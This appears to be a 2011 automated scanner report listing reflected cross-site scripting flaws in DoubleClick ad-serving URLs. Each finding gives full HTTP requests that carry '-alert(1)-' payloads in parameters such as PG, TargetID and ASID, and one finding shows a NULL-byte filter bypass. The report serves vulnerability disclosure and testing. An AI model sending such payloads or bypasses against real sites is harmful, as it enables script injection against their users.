<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... "250" '; url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5601ea"-alert(1)-"ea0886cce92&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/u%3B234278507%3B0-0%3B0%3B58143061%3B4307-300/250%3B39992639/40010426/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e47"-alert(1)-"5c12fb84d15 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR27e47"-alert(1)-"5c12fb84d15&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:41:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5961
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38375"-alert(1)-"118ab6f547d was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=2062499238375"-alert(1)-"118ab6f547d&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:40:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5961
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... g_Film_300x250_V2.jpg"; minV = 6; FWH = ' width="300" height="250" '; url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=2062499238375"-alert(1)-"118ab6f547d&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0dca"-alert(1)-"d645eab062b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=Ge0dca"-alert(1)-"d645eab062b&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:40:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5961
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... /2426847/1-Branding_Film_300x250_V2.jpg"; minV = 6; FWH = ' width="300" height="250" '; url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=Ge0dca"-alert(1)-"d645eab062b&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B4 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257da"-alert(1)-"516683e8192 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=257da"-alert(1)-"516683e8192 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5961 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 01:41:45 GMT Expires: Sun, 30 Jan 2011 01:41:45 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=257da"-alert(1)-"516683e8192http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.co ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac034"-alert(1)-"a5858b7aca9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!ac034"-alert(1)-"a5858b7aca9&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:39:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5961
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa ...[SNIP]... "http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg"; minV = 6; FWH = ' width="300" height="250" '; url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!ac034"-alert(1)-"a5858b7aca9&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9279"-alert(1)-"f18c6157333 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486e9279"-alert(1)-"f18c6157333&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 19:27:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6481
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 18k.jpg"; var minV = 8; var FWH = ' width="300" height="60" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486e9279"-alert(1)-"f18c6157333&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/q%3B232242619%3B3-0%3B0%3B56133728%3B91-300/60%3B39947595/39965382/1%3B ...[SNIP]...
5.10. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4319.msn/B2087123.383
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46184"-alert(1)-"1f112e5f159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=&46184"-alert(1)-"1f112e5f159=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:39:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4953
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... .net/click%3Bh%3Dv8/3a9f/f/6c/%2a/l%3B235359709%3B0-0%3B0%3B58334030%3B3454-728/90%3B39877168/39894955/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196246413.198101735/139941180/direct/01%3fhref=&46184"-alert(1)-"1f112e5f159=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cde"-alert(1)-"304992cdd17 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=42cde"-alert(1)-"304992cdd17 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:39:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4916
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... k.net/click%3Bh%3Dv8/3a9f/7/69/%2a/l%3B235359709%3B0-0%3B0%3B58334030%3B3454-728/90%3B39877168/39894955/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196246413.198101735/139941180/direct/01%3fhref=42cde"-alert(1)-"304992cdd17http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1fc"-alert(1)-"ab9deb67cba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482bb1fc"-alert(1)-"ab9deb67cba&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6678
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0_Webinar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482bb1fc"-alert(1)-"ab9deb67cba&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/x%3B234266103%3B1-0%3B0%3B58044025%3B4307-300/ ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3498"-alert(1)-"1afacfcce21 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665b3498"-alert(1)-"1afacfcce21&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6697
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665b3498"-alert(1)-"1afacfcce21&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/z%3B234265784%3B1-0%3B0%3B58044025%3B4307-300/250%3B39750649/39768436/2%3B%3B%7Esscs ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff0e2"-alert(1)-"cb65f1ae9c0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9dff0e2"-alert(1)-"cb65f1ae9c0&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:50:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6510
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9dff0e2"-alert(1)-"cb65f1ae9c0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/n%3B234266403%3B1-0%3B0%3B58044025%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect. ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59795"-alert(1)-"7c45a99b0fe was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT59795"-alert(1)-"7c45a99b0fe&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 19:27:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6678
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]...
var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT59795"-alert(1)-"7c45a99b0fe&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/d%3B234266103%3B2-0%3B0%3B58044025%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %002096d"-alert(1)-"97b0dfdbd42 was submitted in the PG parameter. This input was echoed as 2096d"-alert(1)-"97b0dfdbd42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT%002096d"-alert(1)-"97b0dfdbd42&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6709 Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 14:50:42 GMT Expires: Sun, 30 Jan 2011 14:50:42 GMT
